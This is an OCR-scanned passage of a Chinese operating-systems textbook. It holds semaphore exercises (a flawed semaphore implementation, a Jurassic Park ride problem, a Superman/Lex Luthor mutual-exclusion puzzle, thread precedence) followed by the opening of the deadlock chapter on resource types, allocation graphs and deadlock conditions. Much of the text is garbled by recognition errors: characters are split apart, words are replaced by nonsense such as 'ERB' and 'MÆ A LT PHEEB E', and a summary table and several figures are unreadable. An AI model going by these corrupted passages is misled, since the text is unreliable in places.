semWaitB(delay) ; 


} 


else SemsignalB (mutex) ; 


void semSignal (semaphore s); 


{ 


semWaitB (mutex) ; 
S++; 
if(s <= 0) 
semSignalB (delay); 
semSignalB (mutex); 


Bb, s 被 设置 成 期 待 的 信号 量 值 ， 每 个 semWait 操作 将 信号 量 减 1， 每 个 semsignal 操作 
将 信号 量 加 1。 二 元 信号 量 mutex 被 初始 化 成 1， 确保 在 更 新 s 时 保证 互 斥 。 二 元 信号 量 delay 被 初 
始 化 成 0， 用 于 阻塞 进程 。 
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上 面 的 程序 有 一 个 缺点 。 找 出 这 个 缺点 ， 并 提出 解决 方案 。 提 示 : 假设 两 个 进程 ， 每 个 都 在 s 
被 初始 化 为 0 时 调用 semwait (s) ， 当 第 一 个 刚刚 执行 了 semSignalB (mutex) 但 还 没有 执行 
semWaitB (daelay) 时 ， 第 二 个 调用 semWait(s) 并 到 达 同 一 点 。 现 在 所 需要 做 的 是 移动 程序 中 的 
一 行 。 

1978 年 ，Dijkstra 提出 了 一 个 推测 ， 使 用 有 限 数目 的 弱 信 号 量 ， 无 法 开发 出 一 种 解决 互 斥 的 方案 ， 
适用 于 数目 未 知 但 有 限 个 进程 且 可 以 避免 饥 俄 。1979 4E, J. M. Morris 提出 了 一 个 使 用 三 个 弱 信 和 号 量 
的 算法 ,反驳 了 这 个 推测 。 算 法 描述 如 下 : 如 果 一 个 或 多 个 进程 正在 semwait (es) 操 作 上 等 待 ， 另 
一 个 进程 正在 执行 semsignal (s) ， 信 号 量 S 的 值 没有 被 修改 ， 并 且 一 个 等 待 进程 被 解除 阻塞 。 除 
了 三 个 信号 量 外 ， 算 法 使 用 两 个 非 负 整 数 变量 ， 作 为 在 算法 特定 区 域 的 进程 数 的 计数 器 。 因 此 ， 信 
号 量 A 和 了 B 被 初始 化 为 1, 而 信号 量 M 和 计数 器 NA、NM 被 初始 化 为 0。 互 斥 信号 量 B 控制 访问 计 
数 器 NA。 一 个 试图 进入 临界 区 的 进程 必须 通过 两 个 分 别 由 信号 量 A 和 M 设置 的 屏障 ， 计 数 器 NA 
和 NM 分 别 表示 准备 通过 屏障 A 以 及 已 经 通过 屏障 A 但 还 没有 通过 屏障 M 的 进程 数 。 在 协议 的 第 二 
部 分 ,在 M 上 阻塞 的 NM 个 进程 将 使 用 类 似 于 第 一 部 分 的 级 联 技术 ， 依 次 进入 它们 的 临界 区 。 定 义 
一 个 算法 实现 上 面 的 描述 。 

下 面 的 问题 曾 被 用 于 一 个 测验 : 

Jurassic 公园 有 一 个 铠 龙 博 物 馆 和 一 个 公园 。 有 m 个 旅客 和 jn 辆 车 ， 每 辆 车 只 能 容纳 一 个 旅客 。 
旅客 在 博物 馆 逛 了 一 会 儿 ， 然 后 排队 乘坐 旅行 车 。 当 一 辆 车 可 用 时 ， 它 载 人 一 个 旅客 ， 然 后 绕 公园 
行驶 任意 长 的 时 间 。 如 果 n 辆 车 都 已 被 旅客 乘坐 游玩 ， 则 想 坐 车 的 旅客 需要 等 待 ， 如 果 一 辆 车 已 经 
就 绪 ， 但 没有 旅客 等 待 ， 那 么 这 辆 车 等 待 。 使 用 信号 量 同 步 m 个 旅客 进程 和 n 个 车 进程 。 

下 面 的 代码 框架 是 在 教室 的 地 板 上 发 现 的 。 忽 略语 法 错误 和 丢掉 的 变量 声明 ， 请 判定 它 是 否 正 
确 ， 注 意 ，P 和 V 分 别 对 应 于 semWait 和 semsignal。 
resource Jurassic _Park({) 

sem car_avail := 0,car_taken := 0,car_filled := 0,passenger_released := 0 





process passenger(i := 1 to num_passengers) 
do true -> nap (int (random(1000*wander time) ) ) 
P (car_avail) ;V(car_taken) ;P(car_filled) 
P(passenger released) 
od 
end passenger 
process car(j := 1 to num_cars) 
do true -> V(car_avail) ;P(car_taken) ;V(car_filled) 
nap (int (random(1000*ride time) )) 
V (passenger_released) 
od 
end car 
end Jurassic Park 
Superman 和 Lex Luthor 是 宿敌 ， 但 是 他 们 都 喜欢 到 Spago's 餐厅 吃饭 ， 并 且 他 们 都 更 喜欢 在 对 方 不 
在 那里 的 时 候 去 光顾 。 考 虑 如 下 代码 ， 该 代码 试图 同步 两 人 对 Spago’s 的 光顾 : 
flag : Boolean (:= 0); // 共享 变量 ， 初 值 为 0 


Superman 
repeat 
< 为 真理 和 正义 而 战 > 
while flag = 1 do {什么 都 不 做 }; 
flag := 1; // 设置 flag 
<I RR > 
falg := 0; // 清除 flag 
forever 


Lex Luthor 
repeat 
<TR > 
while flag = 1 do { 什 么 都 不 做 } ; 
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flag := 1; // KB flag 


flag := 0; // 清除 flag 
forever 
这 一 解决 方案 能 满足 互 斥 的 需求 吗 ” 说 明理 由 。 如 果 该 解决 方案 是 正确 的 ， 给 出 互 斥 的 每 一 条 需求 
并 解释 代码 是 如 何 满足 各 条 需求 的 。 如 果 该 解决 方案 是 错误 的 ， 列 举 出 一 条 被 破坏 了 的 互 斥 需求 。 
注意 ; 我 们 并 不 知道 Supermane 和 Lex Luthor 花 了 多 少时 间 进 行 <...> 内 描述 的 活动 。 
考虑 图 5.10 中 定义 的 无 限 缓冲 区 生产 者 /消费 者 问题 的 解决 方案 。 假设 生产 者 和 消费 者 都 以 大 致 相同 
的 速度 运行 ， 运 行情 况 如 下 : 
生产 者 : append; semSignal; produce; …; append; semSignal; produce; … 
消费 者 : consume; …; take; semWait; consume; …; take; semWait; … 
生产 者 通常 管理 给 缓冲 区 中 添加 一 个 新 元 素 ， 并 在 消费 者 消费 了 前 面 的 元 素 后 发 信号 。 生 产 者 
通常 添加 到 一 个 空 缓冲 区 中 ， 而 消费 者 通常 取 走 缓冲 区 中 的 唯一 元 素 。 尽 管 消费 者 从 不 在 信和 号 量 上 
阻塞 ， 但 必须 进行 大 量 的 信号 量 调用 ， 从 而 产生 相当 多 的 开销 。 
构造 一 个 新 程序 ， 使 得 能 在 这 种 情况 下 更 加 有 效 。 提 示 : 允许 n 的 值 为 -1， 这 表示 不 仅 缓 冲 区 
为 空 ， 而 且 消 费 考 也 检测 到 这 个 事实 并 将 被 阻塞 ， 直 到 生产 者 产生 新 数据 。 这 个 方案 不 需要 使 用 图 
5.10 中 的 局 部 变量 m。 
假设 及 个 进程 共享 一 个 资源 ， 它 们 对 这 个 资源 的 访问 通过 信和 号 量 mutex 控制 。 换 名 话说， 假设 等 
待 访 问 这 个 资源 的 每 个 进程 (P_i ) 的 代码 如 下 : 
program resource_access; 
var mutex: semaphore (:=1)j; 
begin (* 主 程 序 *) 
repeat 
< 其 他 代码 > 
P (mutex) ; 
< 访问 资源 > 
V (mutex); 
< 其 他 代码 > 
forever 
end. 
假设 程序 员 在 编码 P_52 的 过 程 中 犯 了 一 个 下 面 所 说 的 错误 。 在 如 下 两 个 问题 中 ， 给 出 尽 可 能 详尽 
的 回答 。 注 意 : 我 们 并 不 知道 每 个 进程 会 花 多 少时 间 进 行 <...> 内 描述 的 活动 。 
a) WR P_52 中 的 一 个 V 操作 被 替换 成 一 个 P 操 作 会 发 生 什么 ?请 解释 。 
b) 如 果 P_52 中 的 一 个 了 操作 被 替换 成 一 个 V 操作 会 发 生 什 么 ? 请 解释 。 
在 讨论 有 限 缓冲 区 ( 见 图 5.12 ) 生产 者 /消费 者 问题 时 ， 注 意 我 们 的 定义 允许 缓冲 区 中 最 多 有 -1 个 
人 口 ? 
a) 这 是 为 什么 ? 
b ) 请 修改 程序 ， 以 补救 这 种 低 效 。 
考虑 一 个 由 6 个 线程 {T_1,T_2，…,T 6} 组 成 的 系统 , 其 中 用 于 线程 控制 的 唯一 的 机 制 是 信号 量 。 线 
程 要 求 按照 如 下 优先 关系 执行 : 
o T1 结束 了 它 的 主 代码 段 后 ，T_2 才能 开始 执行 ; 
@T1X T3 结束 了 它 的 主 代码 段 后 ，T_5 才 能 开始 执行 ; 
© Ti 和 T_3 都 结束 了 主 代码 段 的 执行 后 ，T_4 才能 开始 执行 ; 
© T6 能 执行 当 且 仅 当 T_4 还 没有 结束 它 的 主 代码 段 的 执行 ( 也 就 是 说 ,如 果 T 4 在 T.6 得 以 开 
始 在 CPU 上 运行 之 前 就 结束 了 ， 那 么 T_6 必须 永远 阻塞 下 去 )。 
假设 主 代码 段 的 功能 是 输出 线程 号 , 例如 对 于 T_1 来 说 , 输出 ONE, 在 每 个 线程 的 主 代码 段 的 前 后 
填写 一 组 信号 量 操作 ， 从 而 保证 不 破坏 上 面 提 到 的 优先 关系 。 另 外 ， 给 出 每 个 信号 量 的 全 局 声明 和 
初 值 。 要 想 得 满 分 ， 你 的 解决 方案 需要 保持 以 上 列 出 的 所 有 的 优先 关系 ， 使 用 尽 可 能 少 的 信和 号 量 ， 
并 且 不 增加 不 必要 的 同步 。 下 面 给 出 了 一 个 程序 框架 供 你 上 手 。 
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program precedence; 
var 
{ 信号 量 声 明 } 


procedure T 1 (); 


begin 
{ 仅 填 和 人 P,，V 语 名 } 
write ("ONE") ; 
{MHA P，V 语 句 } 
end; 


procedure T 6 (); 
begin 
(MA P, view } 
write ("SIX"); 
{MHA P, VV 语句 } 
end; 
begin (* 主 程序 *) 
parbegin 
T 1 (); 
T 2 (); 


T 6 (); 
parend 
end. 


通过 以 下 步骤 说 明 消 息 传递 和 信号 量具 有 同等 的 功能 : 


a ) 用 信号 量 实现 消息 传递 。 提示; 利用 一 个 共享 缓冲 区 保存 信箱 , 每 个 信箱 由 一 个 消息 槽 数组 组 成 。 


b) 用 消息 传递 实现 信号 量 。 提 示 : 引信 一 个 独立 的 间 步 进程 。 
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本 章 继续 探讨 并 发 问题 ， 并 着 重 讲述 在 并 发 处 理 中 通常 需要 解决 的 两 个 问题 : 死 锁 和 饥饿。 
本 章 从 死 锁 的 基本 原理 和 饥饿 的 相关 问题 开始 讨论 ， 接 着 分 析 处 理 死 锁 的 三 种 常用 方法 : 预防 、 
检测 和 避免 ， 然 后 考虑 用 于 说 明 同 步 和 死 锁 的 一 个 经 典 问题 : 哲学 家 就 餐 问 题 。 

与 第 5 章 一 样 , 关于 本 章 的 讨论 仅 限于 单个 系统 中 的 并 发 和 死 锁 问题 , 解决 分 布 式 系 统 中 死 
锁 问题 的 方法 将 在 第 18 章 讲 述 。 


6.1 死 锁 的 原理 


可 以 把 死 锁定 义 为 一 组 相互 竞争 系统 资源 或 进行 通信 的 进程 间 的 “永久 ”阻塞 。 当 一 组 进程 中 
的 每 个 进程 都 在 等 待 某 个 事件 〈 典型 的 情况 是 等 待 所 请 求 资源 的 释放 )， 而 只 有 在 这 组 进程 中 的 其 
他 被 阻塞 的 进程 才 可 以 触发 该 事件 ， 这 时 就 称 这 组 进程 发 生死 锁 。 因 为 没有 事件 能 够 被 触发 ， 故 死 
锁 是 永久 性 的 。 与 并 发 进程 管理 中 的 其 他 问题 不 同 ， 死 锁 问题 并 没有 一 种 有 效 的 通用 解决 方案 。 
所 有 死 锁 都 涉及 两 个 或 多 个 进程 之 间 对 资源 需求 的 冲突 。 一 个 常见 的 例子 是 交通 死 锁 。 图 
6.1a 显示 了 4 辆 车 几乎 同时 到 达 一 个 十 字 路 口 , 并 相互 交叉 地 停 了 下 来 。 交叉 点 上 的 4 个 象限 是 
需要 被 控制 的 资源 。 特 别 地 ， 如 果 这 4 辆 车 都 想 笔 直 地 驶 过 十 字 路 口 ， 那 么 对 资源 的 要 求 如 下 : 
向 北 行驶 的 车 1 需要 象限 a 和 b。 
向 西行 驶 的 车 2 需要 象限 b co 
向 南 行驶 的 车 3 需要 象限 c 和 d 
向 东 行驶 的 车 4 需要 象限 4 和 a 


oo 
I 


a) 可 能 死 锁 b) 死 锁 
图 6.1 死 锁 的 图 示 


ERB, 道路 行驶 的 一 般 规则 是 , 停 在 十 字 路 口 的 车 应 该 给 在 它 右边 的 车 让 路 。 如 果 在 十 字 
路 口 只 有 两 辆 或 三 辆 车 时 ， 这 个 规则 是 可 行 的 。 例 如 ， 如 果 只 有 北 行 和 西行 的 车 到 达 十 字 路 口 ， 
北 行 的 车 将 等 待 而 西行 的 车 继续 前 进 , 但 是 , 如 果 4 辆 车 几乎 同时 到 达 , 则 每 辆 车 都 应 避免 进入 
十 字 路 口 这 造成 了 一 种 潜在 的 死 锁 。 因为 对 于 任何 一 辆 车 继续 前 进 所 需 的 资源 都 还 能 满足 , 所 以 
死 锁 只 是 潜在 的 ， 还 没有 实际 发 生 。 最 终 只 要 有 一 辆 车 能 前 进 ， 就 不 会 发 生死 锁 。 

WR 4 辆 车 都 忽视 这 个 规则 ， 而 继续 同时 前 进 到 十 字 路 口 , 则 每 辆 车 都 占据 一 个 资源 (一 个 
象限 )， 由 于 所 需要 的 第 二 个 资源 被 另 一 辆 车 占据 ， 它 们 都 不 能 前 进 ， 这 才 发 生 了 真正 的 死 锁 。 





现在 考虑 涉及 进程 和 计算 机 资源 的 死 锁 的 措 述 。 图 6.2( 基于 [BAC003] ) 称 做 “联合 进程 图 ”， 
显示 了 两 个 进程 竞争 两 个 资源 的 进展 情况 , 每 个 进程 都 需要 独占 使 用 这 两 个 资源 一 段 时 间 。 两 个 
EE PA Q 的 一 般 形式 如 下 : 


进程 P 进程 Q 
获得 amn 
获得 了 am A 
释放 人 释放 
释放 释放 人 


在 图 6.2 中 ， 瑟 轴 表 示 P 的 执行 进展 ，y 轴 表 示 Q 的 执行 进展 ， 因 此 两 个 进程 的 共同 进展 由 
从 原点 开始 向 东北 方 的 前 进 路 径 表示 。 对 一 个 单 处 理 器 系统 , 一 次 只 有 一 个 进程 可 以 执行 ,路径 
由 交替 的 水 平 段 和 垂直 段 组 成 。 水 平 段 表示 P 执行 而 Q 等 待 的 时 期 ， 垂 直 段 表示 Q 执行 而 P 等 
待 的 时 期 。 图 中 显示 了 P 和 Q 都 请 求 资源 A ( 斜 线 区 域 ) 的 区 域 、P 和 Q 都 请 求 资源 B (Re 
线 区 域 ) 的 区 域 以 及 P 和 Q 请 求 资源 A 和 B 的 区 域 。 因 为 假定 每 个 进程 需要 对 资源 进程 互 斥 访 
问 控制 ， 所 以 这 幅 图 给 出 了 6 种 不 同 的 执行 路 径 ， 可 总 结 如 下 : 


Q 的 进展 
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7 7 P 的 进展 
ZAP 和 Q 都 想 要 资源 人 获得 A WEB 释放 A 释放 B 
图 P A Q 都 想 要 资源 B WRA 
死 锁 不 可 避免 的 区 域 请 求 B 
—— P 和 Q 的 可 能 的 进展 路 径 
路 径 的 水 平 部 分 表示 P 正在 执行 而 Q 正在 等 待 
路 径 的 短 直 部 分 表示 Q 正在 执行 而 P 正在 等 待 


图 6.2” 死 锁 的 例子 


1) Q 获得 B， 然 后 获得 A; 然后 释放 B 和 A。 当 P 恢复 执行 时 ， 它 可 以 获得 全 部 资源 。 

2) Q 获得 B， 然 后 获得 A; P 执行 并 阻塞 在 对 A 的 请 求 上 ; Q 释放 B 和 A。 当 P 恢复 执行 
时 ， 它 可 以 获得 全 部 资源 。 

3) Q 获得 B， 然 后 P 获得 A; 由 于 在 继续 执行 时 ， Es 因而 死 
锁 是 不 可 避免 的 。 

4)P 获得 A， 然 后 Q 获得 B; 由 于 在 继续 执行 时 ，Q MÆ A LT PHEEB E, 因而 死 
锁 是 不 可 避免 的 。 
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5》P 获得 A， 然 后 获得 B; Q 执行 并 阻塞 在 对 B 的 请 求 上 ; P 释放 A 和 :B。 当 Q 恢复 执行 
时 ， 它 可 以 获得 全 部 资源 。 

6) P 获得 A， 然 后 获得 B; 然后 释放 A 和 B。 当 Q 恢复 执行 时 ， 它 可 以 获得 全 部 资源 。 

图 6.2 的 灰色 阴影 区 域 ， 也 称 为 敏感 区 域 ， 也 就 是 路 径 3 和 4 的 注释 部 分 。 如 果 执 行路 径 
进入 了 这 个 敏感 区 域 ， 那 么 死 锁 就 不 可 避免 了 。 注 意 敏感 区 域 的 存在 依赖 于 两 个 进程 的 逻辑 
关系 。 然 而 ， 如 果 两 个 进程 的 交互 过 程 创建 了 能 够 进入 敏感 区 的 执行 路 径 ， 那 么 死 锁 就 必然 
发 生 。 

是 否 会 发 生死 锁 取 决 于 动态 执行 和 应 用 程序 细节 。 例 如 ， 假设 P 不 同时 需要 两 个 资源 ， 则 
两 个 进程 有 下 面 的 形式 : 


进程 P . 进程 Q 
获得 A 获得 B 
释放 人 获得 A 
获得 B 释放 B 
Rik B 释放 A 


图 6.3 反映 了 这 种 情况 ,不 论 两 个 进程 的 相对 时 间 安 排 如 何 ， 总 不 会 发 生死 锁 。 





Q 的 进展 
FBLA 
PRA HB 

RB A! 
WRB 

获得 B 

获得 A MMA 获得 B 释放 B “和 局 的 进展 

Z P 和 Q 都 想 要 资源 A 请 求 A 请 求 B 
P 和 Q 都 想 要 资源 B me P 和 Q 的 可 能 的 进展 路 径 


路 径 的 水 平 部 分 表示 了 正在 执行 而 Q 正在 等 待 
路 径 的 垂直 部 分 表示 Q 正在 执行 而 正在 等 待 


6.3 ”无 死 锁 的 例子 [BACO03] 


如 上 所 示 , 联合 进程 图 可 以 用 来 记录 共享 资源 的 两 个 进程 的 执行 历史 。 如 果 多 于 两 个 进程 竞 
争 共享 资源 ， 则 需要 更 高 维 的 图 来 表示 。 但 涉及 敏感 区 和 死 锁 的 原理 却 是 一 样 的 。 


6.1.1 可 重用 资源 


资源 通常 可 分 为 两 类 : 可 重用 的 和 可 消耗 的 。 可 重用 资源 是 指 一 次 只 能 殿 一 个 进程 安全 地 使 
Al, 并 且 不 会 由 于 使 用 而 耗 尽 的 资源 。 进 程 得 到 资源 单元 ， 后 来 又 释放 这 些 单元 ， 殿 其 他 进程 再 
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次 使 用 。 可 重用 资源 的 例子 包括 处 理 器 、IQ ,通道 、 内 存 和 外 存 、 设 备 以 及 诸如 文件 、 数 据 库 和 
信号 量 之 类 的 数据 结构 。 | 

下 面 举 一 个 涉及 可 重用 资源 死 锁 的 例子 ， 考 虑 竞争 独占 访问 磁盘 文件 D 和 磁带 设备 T 的 两 
个 进程 ， 参 与 该 操作 的 程序 如 图 6.4 所 示 。 如 果 每 个 进程 占有 一 个 资源 并 请 求 另 一 个 资源 ， 就 会 
发 生死 锁 。 例 如 ， 如 果 多 道 程序 设计 系统 交替 地 执行 两 个 进程 ， 则 会 发 生死 锁 ， 如 下 所 示 : 

PoP 909. P2492 

这 可 能 看 起 来 更 像 程序 设计 的 错误 ， 而 不 是 操作 系统 设计 者 的 问题 。 但 是 ， 我 们 已 经 看 到 并 
发 程序 设计 是 非常 具有 挑战 性 的 ， 这 类 死 锁 的 确 会 发 生 ， 而 起 因 却 常常 隐藏 于 复杂 的 程序 逻辑 中 ， 
这 使 得 检测 变 得 非常 困难 。 处 理 这 类 死 锁 的 一 个 策略 是 给 系统 设计 施加 关于 资源 请 求 顺序 的 约 柬 。 


进程 P 进程 Q 
步骤 操作 步骤 操作 
£ en 









0 
图 6.4 ”两 个 进程 竞争 可 重用 资源 的 例子 


可 重用 资源 死 锁 的 另 一 个 例子 是 关于 内 存 请 求 。 假 设 可 用 的 分 配 空间 为 200KB， 且 发 生 下 
面 的 请 求 序列 


Pl P2 


Request 80 Kbytes; Request 70 Kbytes; 


Request 60 Kbytes; Request 80 Kbytes; 





如 果 两 个 进程 都 前 进 到 它们 的 第 二 个 请 求 时 , 则 会 发 生死 锁 。 如 果 事 先 并 不 知道 请 求 的 存储 
空间 总 量 , 则 很 难 通过 系统 设计 约束 处 理 这 类 死 锁 。 解决 这 类 特殊 问题 的 最 好 办 法 是 , 通过 使 用 
虚拟 内 存 有 效 地 消除 这 种 可 能 性 。 虚 存 将 在 第 8 章 讲述 。 


6.1.2 ”可 消耗 资源 


可 消耗 资源 是 指 可 以 被 创建 (生产 ) 和 销毁 ( 消耗 ) 的 资源 。. 通 常 对 某 种 类 型 可 消耗 资源 的 
数目 没有 限制 , 一 个 无 阻塞 的 生产 进程 可 以 创建 任意 数目 的 这 类 资源 。 当 消费 进程 得 到 一 个 资源 
时 ， 该 资源 就 不 再 存在 了 。 可 消耗 资源 的 例子 有 中 断 、 信 号 、 消 息 和 IO 缓冲 区 中 的 信息 。 

作为 一 个 涉及 可 消耗 资源 死 锁 的 例子 , 考虑 下 面 的 进程 对 , 每 个 进程 试图 从 另 一 个 进程 接收 
消息 ， 然 后 再 给 那个 进程 发 送 一 条 消息 : 


Pl 





P2 


Receive (P2); Receive (P1); 





Send (P2,M1); Send (P1,M2); 


如 果 Receive 阻塞 ( 即 接收 进程 被 阻塞 直到 收 到 消息 )， 则 发 生死 锁 。 同 样 ， 引 发 死 锁 的 原 
因 是 一 个 设计 错误 。 这 类 错误 比较 微妙 , 因而 难以 发 现 。 此 外 , 罕见 的 事件 组 会 也 可 能 导致 死 锁 ， 
因此 只 有 当 程 序 使 用 了 相当 长 的 一 段 时 间 甚 至 几 年 后 ， 才 可 能 出 现 这 类 问题 ( 即 发 生死 锁 )。 l 

没有 一 个 可 以 解决 所 有 类 型 死 锁 的 有 效 策略 。 表 6.1 概括 了 已 有 方法 中 最 重要 的 那些 方法 的 
ER: 预防 、 吉 免 和 检测 。 我 们 首先 详细 阔 述 死 锁 的 条 件 ， 然 后 依次 分 析 每 种 方法 。 
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表 6.1 操作 系统 中 死 锁 检测 、 预 防 和 避免 方法 小 结 [1SLO80] 
ee ee EEF 


e a 连 让 活动 的 进程 非常 | MA 
Amat oa ICH HSE WLR 
保守 的 ; | 。 用 于 状态 易于 保存 和 恢复 的 资 |。 过 于 经 常 地 没 必 要 地 抢占 
交 资 源 源 时 非常 方便 
。 通过 编译 时 检测 是 可 以 实施 的 
sme | 。 既然 问题 已 经 在 系统 设计 时 解 | 。 禁止 增加 的 资源 请 求 
eee | 不 需要 在 运行 时 间 计算 


预防 中 间 了 。 进程 不 能 被 长 时 间 阻 塞 
akg 只 ih amie al ° ca ae! 
alah 


se 固有 的 抢占 被 丢失 
6.1.3 ”资源 分 配 图 


刻画 进程 的 资源 分 配 的 有 效 工 具 是 Holt[HOLT721 引 入 的 资源 分 配 图 (resource allocation 
graph )。 资 源 分 配 图 是 有 向 图 ， 它 阐述 了 系统 资源 和 进程 的 状态 ， 每 个 资源 和 进程 用 节点 表示 。 
图 中 从 进程 指向 资源 的 边 表示 进程 请 求 资源 但 是 还 没有 得 到 授权 ， 如 图 6.5a 所 示 。 资 源 节点 中 ， 
圆 点 表示 资源 的 每 一 个 实例 。LIO 设备 就 是 有 多 个 资源 实例 的 资源 类 型 ， 它 由 操作 系统 中 的 资源 
管理 模块 来 分 配 。 图 中 从 可 重用 资源 节点 中 的 点 到 一 个 进程 的 边 表示 请 求 已 经 被 授权 , 如 图 6.5b 
所 示 ; 也 就 是 说 , 该 进程 已 经 被 安排 了 一 个 单位 的 资源 。 图 中 从 可 消耗 资源 节点 中 的 点 到 一 个 进 
程 的 边 表 示 进 程 是 资源 生产 者 。 






则 



























a) 资源 被 请 求 





c) 循环 等 待 - d 不 发 生死 锁 
图 6.5 资源 分 配 图 的 例子 
图 6.5c 是 一 个 死 锁 的 例子 。 资 源 Ra 和 Bb 都 仅 拥有 一 个 单位 的 资源 。 进 程 Pl 持 有 Rb 同时 


请 求 Ra， 同 时 ，P2 进程 持 有 Ra 同时 又 请 求 Rb。 图 6.5d 和 图 6.5c 有 同样 的 拓扑 结构 ， 但 是 图 
6.5d 不 会 发 生死 锁 ， 因为 每 个 资源 有 多 个 使 用 实例 。 
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图 6.6 中 的 资源 分 配 图 的 死 锁 情况 与 图 6.1b 相似 。 5 6.5c 不 同 , 图 6.6 并 不 是 两 个 进程 彼 
此 拥有 对 方 需 要 的 资源 这 种 简单 的 情况 ， 而 是 存在 进程 和 资源 的 环 ， 从 而 导致 了 死 锁 。 





图 6.6 图 6.1b 的 资源 分 配 图 


6.1.4 死 锁 的 条 件 
死 锁 有 三 个 必要 条 件 ， 
1) 互 斥 。 一 次 只 有 一 个 进程 可 以 使 用 一 个 资源 。 其 他 进程 不 能 访问 已 分 配给 其 他 进程 的 资源 。 
2) 点 有 且 等 待 。 当 一 个 进程 等 待 其 他 进程 时 ， 继 续 占 有 已 经 分 配 的 资源 。 
3 ) 不 可 抢占 。 不 能 强行 抢占 进程 已 占有 的 资源 。 
在 很 多 情况 下 这 些 条 件 都 是 合乎 要 求 的 。 例 如 ， 为 确保 结果 的 一 致 性 和 数据 库 的 完 
整 性 ， 互 斥 是 非常 有 必要 的 。 同 理 ， 不 能 随意 地 进行 资源 抢占 。 比 如 ， 当 涉及 数据 资源 
时 ， 必 须 提 供 回 滚 恢复 机 制 (rollback recovery mechanism) 以 支持 资源 抢占 ,这样 才能 
把 进程 和 它 的 资源 恢复 到 以 前 适当 的 状态 ， 使 得 进程 最 终 可 以 重复 它 的 动作 。 
前 三 个 条 件 都 只 是 死 锁 存在 的 必要 条 件 ， 但 不 是 充分 条 件 。 对 死 锁 的 产生 ， 还 需要 
第 四 个 条 件 : 
4) 循环 等 待 。 存 在 一 个 封闭 的 进程 链 ， 使 得 每 个 进程 至 少 占有 此 链 中 下 一 个 进程 所 需要 的 
一 个 资源 ， 如 图 5.5c 和 图 6.6 所 示 。 
第 四 个 条 件 实 际 上 是 前 三 个 条 件 的 潜在 结果 , 即 假设 前 三 个 条 件 存在 , 可 能 发 生 的 一 系列 事 
件 会 导致 不 可 解 的 循环 等 待 。 这 个 不 可 解 的 循环 等 待 实际 上 就 是 死 锁 的 定义 。 条 件 4 中 列 出 的 循 
环 等 待 之 所 以 是 不 可 解 的 , 是 因为 有 前 面 三 个 条 件 的 存在 。 因此 , 这 四 个 条 件 连 在 一 起 构成 了 死 
锁 的 充分 必要 条 件 。9 
为 了 能 够 让 上 面 的 讨论 更 清晰 ， 有 必要 进一步 讨论 图 6.2 所 示 的 联合 进程 图 。 在 该 图 中 定义 
了 一 个 敏感 区 域 ， 当 进程 运行 至 该 区 域 后 ,就 一 定 会 发 生死 锁 。 只 有 当 上 面 列 出 的 前 三 个 条 件 都 
满足 时 ， 这 种 敏感 区 域 才 存在 。 如 果 一 个 或 者 多 个 条 件 不 能 满足 ， 就 不 存在 所 谓 的 敏感 区 域 ， 死 
锁 也 不 会 发 生 。 因 此 ， 上 述 前 三 个 条 件 是 死 锁 的 必要 条 件 。 不 仅 进入 敏感 区 域 会 发 生死 锁 ， 而 且 
导致 进入 敏感 区 域 的 资源 请 求 的 顺序 也 会 发 生死 锁 。 如 果 出 现 循环 等 待 的 情况 , 那么 进程 实际 上 
已 经 进入 了 敏感 区 域 。 因 此 ， 上 述 四 个 条 件 是 死 锁 的 充分 条 件 。 总 结 如 下 : 


O 实际 上 ， 所 有 书籍 都 仅 列 出 了 这 四 个 条 件 作为 死 锁 需要 的 条 件 ， 但 这 种 介绍 模糊 了 一 些 细节 问题 。 第 四 项 御 
环 等 待 条 件 与 其 他 三 个 条 件 有 本 质 区 别 。 第 一 项 到 弟 三 项 是 第 略 各 件 ， 而 第 四 项 是 取决 二 所 涉及 到 有 的 进程 请 
求 各 释放 资源 的 顺序 而 可 能 发 生 的 一 种 情况 。 入 环 等 待 与 三 个 必要 条 件 导 致 了 死 锁 “ 预 防 "和 ?避免 * 庆 间 存 在 的 
差别 。 详 细 讨 论 请 参阅 [SHUB90] 和 [SHUB031。 
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4. 循环 等 待 








有 三 种 方法 可 以 处 理 死 锁 。 第 一 种 方法 是 采用 某 种 策略 来 消除 条 件 1 至 4 中 的 一 个 条 件 的 出 
现 来 预防 死 锁 。 第 二 种 方法 是 基于 资源 分 配 的 当前 状态 做 动态 选择 来 避免 死 锁 。 第 三 种 方法 是 试 
图 检测 死 锁 ( 满足 条 件 1 至 4 ) 的 存在 并 且 试 图 从 死 锁 中 恢复 出 来 。 下面 将 依次 来 讨论 每 种 方法 。 


6.2” 死 锁 预防 


简单 地 讲 ， 死 锁 预 防 ( deadlock prevention) 策略 是 试图 设计 一 种 系统 来 排除 发 生死 锁 的 可 
能 性 。 可 把 死 锁 预防 方法 分 成 两 类 。 一 -种 是 间接 的 死 锁 预 防 方法 , 即 防止 前 面 列 出 的 三 个 必要 条 
件 中 任何 一 个 的 发 生 ( 见 6.4.1 节 到 6.4.3 节 ); 一 种 是 直接 的 死 锁 预防 方法 ， 即 防止 循环 等 待 的 
RE (I 6.4.4 节 )。 下 面具 体 分 析 与 这 四 个 条 件 相 关 的 技术 问题 。 


6.2.1 BF 


一 般 来 说 , 在 所 列 出 的 四 个 条 件 中 ,第 一 个 条 件 不 可 能 禁止 。 如 果 需 要 对 资源 进行 互 斥 访问 ， 
那么 操作 系统 必须 支持 互 斥 。 某 些 资源 , 如 文件 , 可 能 允许 多 个 读 访 问 , 但 只 人 允许 互 斥 的 写 访问 ， 
即使 在 这 种 情况 下 ， 如 果 有 多 个 进程 要 求 写 权限 ， 也 可 能 发 生死 锁 。 


6.2.2 ”占有 且 等 待 


为 预防 占有 且 等 待 的 条 件 , 可 以 要 求 进 程 一 次 性 地 请 求 所 有 需要 的 资源 , 并 且 阻 塞 这 个 进程 
直到 所 有 请 求 都 同时 满足 。 这 种 方法 在 两 个 方面 是 低 效 的 。 首先 , 一 个 进程 可 能 被 阻塞 很 长 时 间 ， 
以 等 待 满足 其 所 有 的 资源 请 求 。 而 实际 上 ， 只 要 有 一 部 分 资源 ， 它 就 可 以 继续 执行 。 第 二 ， 分 配 
给 一 个 进程 的 资源 可 能 有 相当 长 的 一 段 时 间 不 会 被 使 用 , 且 在 此 期 间 ,它们 不 能 被 其 他 进程 使 用 。 
另 一 个 问题 是 一 个 进程 可 能 事先 并 不 会 知道 它 所 需要 的 所 有 资源 。 

这 也 是 应 用 程序 在 使 用 模块 化 程序 设计 或 多 线程 结构 时 产生 的 实际 问题 ,为 了 同时 请 求 所 需 
资源 ， 应 用 程序 需要 知道 它 以 后 将 在 所 有 级 别 或 所 有 模块 中 请 求 的 所 有 资源 。 


6.2.3 不 可 抢占 


